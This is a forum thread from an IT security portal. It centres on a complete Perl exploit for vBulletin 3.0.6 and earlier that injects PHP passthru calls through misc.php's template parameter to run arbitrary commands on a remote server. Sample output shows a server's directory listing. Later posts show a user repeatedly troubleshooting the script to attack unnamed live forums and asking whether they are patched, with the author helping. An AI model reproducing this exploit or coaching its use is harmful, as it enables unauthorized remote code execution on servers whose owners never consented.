 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
vbulletin <=3.0.6 misc.php remote execution (perl) |
 |
 Posted: Tue Sep 20, 2005 3:27 pm |
 |
|
| subzero |
| Valuable expert |
 |
| |
| Joined: Mar 16, 2005 |
| Posts: 42 |
|
|
|
 |
|
 |
|
| Quote: | #!/usr/bin/perl
# vBulletin <= 3.0.6 Add templates remote execute exploit (perl)
# suBzero@kisobox.com
# Reference: http://www.securityfocus.com/bid/12622/info
#
use IO::Socket;
if (@ARGV < 3)
{
print q(
[+] vBulletin <= 3.0.6 Add templates
[+] suBzero@kisobox.com
[+] Reference: http://www.securityfocus.com/bid/12622/info
[+] Usage : vbulletin306.pl example.com /forums/ "uname id" ;
);
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$cmd = $ARGV[2];
$serv =~ s/(http:\/\/)//eg;
print "\n";
print " [+] vBulletin 3.0.6 kisobox.com \r\n";
print " [+] Sending regard to $serv$dir \r\n";
print " [+] Command $cmd \r\n";
print " [+] Exploiting on progress \r\n";
$cmd = "echo _START_;".$cmd.";echo _END_"; #strOke,dont kill me 4 this
$byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
$data = $dir;
$data .= "misc.php?do=page&template={\${passthru($byte)}}";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] Connection error\r\n";
print $sock "GET $data HTTP/1.1\n";
print $sock "Host: $serv\n";
print $sock "Accept: */*\n";
print $sock "Content-Length: ".length($data)." \n".
print $sock "Connection: close\n\n";
$on = 0; #flag
while ($res = <$sock>)
{
if ($res =~ /^_END_/)
{ print "---------------------------------------------\r\n"; exit();}
if ($on == 1) { print "$res"; }
if ($res =~ /^_START_/)
{ $on = 1; }
}
print "[-] Exploit failed \r\n";
print "---------------------------------------------\r\n"; |
http://kisobox.com/exploits/vbulletin306.txt
save as .pl
example exploit
C:\>perl vbulletin306.pl xxx /forums/ "ls -la"
[+] vBulletin 3.0.6 kisobox.com
[+] Sending regard to xxx/forums/
[+] Command ls -la
[+] Exploiting on progress
1000
total 1204
drwxr-xr-x 15 511 root 4096 Sep 13 15:21 .
drwxrwxr-x 54 wwwuser wwwuser 4096 Jul 18 11:18 ..
-rw------- 1 root root 23910 Sep 19 16:01 DEADJOE
drwxr-xr-x 2 root root 4096 Oct 18 2003 admin
drwxr-xr-x 3 root root 4096 Jan 20 2005 admincp
-rw-r--r-- 1 root root 6694 Jan 20 2005 announcement.php
drwxr-xr-x 2 root root 4096 Jan 20 2005 archive
-rw-r--r-- 1 root root 7394 Jan 20 2005 attachment.php |
|
|
|
|
|
|
|
|
| Posted: Sat Feb 25, 2006 11:56 am |
|
|
| lookatmenow |
| Regular user |
 |
| |
| Joined: Feb 24, 2006 |
| Posts: 21 |
|
|
|
|
|
|
|
i downloaded perl, put it in c:\perl
however, when i go to properties for command prompt, i change the starting directory to c:\
which comes up as c:\> when i open it. then i type in perl after that, which gives me c:\>perl
it says ''perl is not recognised as an internal or external command, operable programme or batch file''.
i then went back to the properties of the command prompt and changed the default directory to c:\perl
and when i open command prompt i type in after c:\perl>vbulletin306.pl although this merely opens the vbulletin.pl file in to notepad.
i've tried exectuting the whole line with c:\perl>vbulletin306.pl website.com /forums/ "Is -la" then hit enter... and the same happens, just opens the .pl file in to notepad.
would like to know where i'm going wrong. cheers. |
|
|
|
|
|
|
|
|
| Posted: Sun Feb 26, 2006 4:37 am |
|
|
| subzero |
| Valuable expert |
|
| |
| Joined: Mar 16, 2005 |
| Posts: 42 |
|
|
|
|
|
|
|
go to any open folder >> view >> folder option and disable by clicking the extension disable.
change save file to .pl .
i guess your previous file was saved as vb306.pl.txt.
correct me if im wrong. |
|
|
|
|
| Posted: Sun Feb 26, 2006 11:53 am |
|
|
| lookatmenow |
| Regular user |
|
| |
| Joined: Feb 24, 2006 |
| Posts: 21 |
|
|
|
|
|
|
|
| It's saved as vb306.pl. Although when I look at the properties, it's default program to open with is still 'notepad'. Should that be changed? |
|
|
|
|
|
|
|
|
| Posted: Sun Feb 26, 2006 3:39 pm |
|
|
| lookatmenow |
| Regular user |
|
| |
| Joined: Feb 24, 2006 |
| Posts: 21 |
|
|
|
|
|
|
|
| Quote: |
c:\>perl vbulletin306.pl
Backslash found where operator expected at vbulletin306.pl line 1, near "rtf1\"
Backslash found where operator expected at vbulletin306.pl line 1, near "ansi\"
Backslash found where operator expected at vbulletin306.pl line 1, near "ansicpg
1252\"
Backslash found where operator expected at vbulletin306.pl line 1, near "deff0\"
Backslash found where operator expected at vbulletin306.pl line 1, near "f0\"
Backslash found where operator expected at vbulletin306.pl line 1, near "fswiss\
"
syntax error at vbulletin306.pl line 1, near "rtf1\"
syntax error at vbulletin306.pl line 1, near "}}"
Execution of vbulletin306.pl aborted due to compilation errors.
|
i've got it working now 'perl' that is. However, now there is this error that comes up. Here the script of the vbulletin306.pl file:
| Quote: |
{\rtf1\ansi\ansicpg1252\deff0\deflang2057{\fonttbl{\f0\fswiss\fcharset0 Arial;}}
{\*\generator Msftedit 5.41.15.1507;}\viewkind4\uc1\pard\f0\fs20 #!/usr/bin/perl\par
\par
# vBulletin <= 3.0.6 Add templates remote execute exploit (perl)\par
# suBzero@kisobox.com\par
# Reference: http://www.securityfocus.com/bid/12622/info\par
#\par
\par
use IO::Socket;\par
\par
if (@ARGV < 3)\par
\{\par
print q(\par
[+] vBulletin <= 3.0.6 Add templates \par
[+] suBzero@kisobox.com\par
[+] Reference: http://www.securityfocus.com/bid/12622/info\par
[+] Usage : vbulletin306.pl example.com /forums/ "uname id" ;\par
); \par
exit;\par
\}\par
\par
$serv = $ARGV[0];\par
$dir = $ARGV[1];\par
$cmd = $ARGV[2];\par
\par
$serv =~ s/(http:\\/\\/)//eg;\par
print "\\n";\par
print " [+] vBulletin 3.0.6 kisobox.com \\r\\n";\par
print " [+] Sending regard to $serv$dir \\r\\n";\par
print " [+] Command $cmd \\r\\n";\par
print " [+] Exploiting on progress \\r\\n";\par
\par
$cmd = "echo _START_;".$cmd.";echo _END_"; #strOke,dont kill me 4 this\par
$byte = join('.', map \{ $_ = 'chr('.$_.')' \} unpack('C*', $cmd)); \par
$data = $dir;\par
$data .= "misc.php?do=page&template=\{\\$\{passthru($byte)\}\}";\par
\par
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] Connection error\\r\\n";\par
\par
print $sock "GET $data HTTP/1.1\\n";\par
print $sock "Host: $serv\\n";\par
print $sock "Accept: */*\\n";\par
print $sock "Content-Length: ".length($data)." \\n".\par
print $sock "Connection: close\\n\\n";\par
\par
$on = 0; #flag\par
\par
while ($res = <$sock>)\par
\{\par
if ($res =~ /^_END_/) \par
\{ print "---------------------------------------------\\r\\n"; exit();\}\par
if ($on == 1) \{ print "$res"; \}\par
if ($res =~ /^_START_/) \par
\{ $on = 1; \}\par
\}\par
print "[-] Exploit failed \\r\\n";\par
print "---------------------------------------------\\r\\n";\par
}
|
Is the script perhaps wrong? Although it is the one from kisobox.com/exploits/vbulletin306.txt |
|
|
|
|
|
|
|
|
| Posted: Sun Feb 26, 2006 3:47 pm |
|
|
| lookatmenow |
| Regular user |
|
| |
| Joined: Feb 24, 2006 |
| Posts: 21 |
|
|
|
|
|
|
|
o.k. Feel as though i'm getting closer. Although I now get this error:
| Quote: |
C:\>perl vb306.pl site.com /forum/ "Is -la"
[+] vBulletin 3.0.6 kisobox.com
[+] Sending regard to site.com/forum/
[+] Command Is -la
[+] Exploiting on progress
Can't locate object method "new" via package "IO::Socket::INET" (perhaps you for
got to load "IO::Socket::INET"?) at vb306.pl line 17.
c:\>
|
The script I now have in the .pl file is this:
| Quote: |
$serv = $ARGV[0];
$dir = $ARGV[1];
$cmd = $ARGV[2];
$serv =~ s/(http:\/\/)//eg;
print "\n";
print " [+] vBulletin 3.0.6 kisobox.com \r\n";
print " [+] Sending regard to $serv$dir \r\n";
print " [+] Command $cmd \r\n";
print " [+] Exploiting on progress \r\n";
$cmd = "echo _START_;".$cmd.";echo _END_"; #strOke,dont kill me 4 this
$byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
$data = $dir;
$data .= "misc.php?do=page&template={\${passthru($byte)}}";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] Connection error\r\n";
print $sock "GET $data HTTP/1.1\n";
print $sock "Host: $serv\n";
print $sock "Accept: */*\n";
print $sock "Content-Length: ".length($data)." \n".
print $sock "Connection: close\n\n";
$on = 0; #flag
while ($res = <$sock>)
{
if ($res =~ /^_END_/)
{ print "---------------------------------------------\r\n"; exit();}
if ($on == 1) { print "$res"; }
if ($res =~ /^_START_/)
{ $on = 1; }
}
print "[-] Exploit failed \r\n";
print "---------------------------------------------\r\n";
|
Sorry about the number of posts. I'm quite the spammer  |
|
|
|
|
|
|
|
|
| Posted: Sun Feb 26, 2006 4:11 pm |
|
|
| lookatmenow |
| Regular user |
|
| |
| Joined: Feb 24, 2006 |
| Posts: 21 |
|
|
|
|
|
|
|
Sorted.
I used the text from your quote in that first post, and made that the 'vb306.pl' file. I finally get to the 'exploit part', however I always get 'exploit failed', without the rest of the text following:
| Quote: |
c:\>perl vb306.pl site.com /forums/ "Is -la"
[+] vBulletin 3.0.6 kisobox.com
[+] Sending regard to site.com/forums/
[+] Command Is -la
[+] Exploiting on progress
[-] Exploit failed
---------------------------------------------
c:\>
|
Does this mean their forums are patched, to stop this exploit? |
|
|
|
|
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 2
New Yesterday: 3
Overall: 7982
People Online:
Visitors: 201
Members: 2
Total: 203
Online Now:
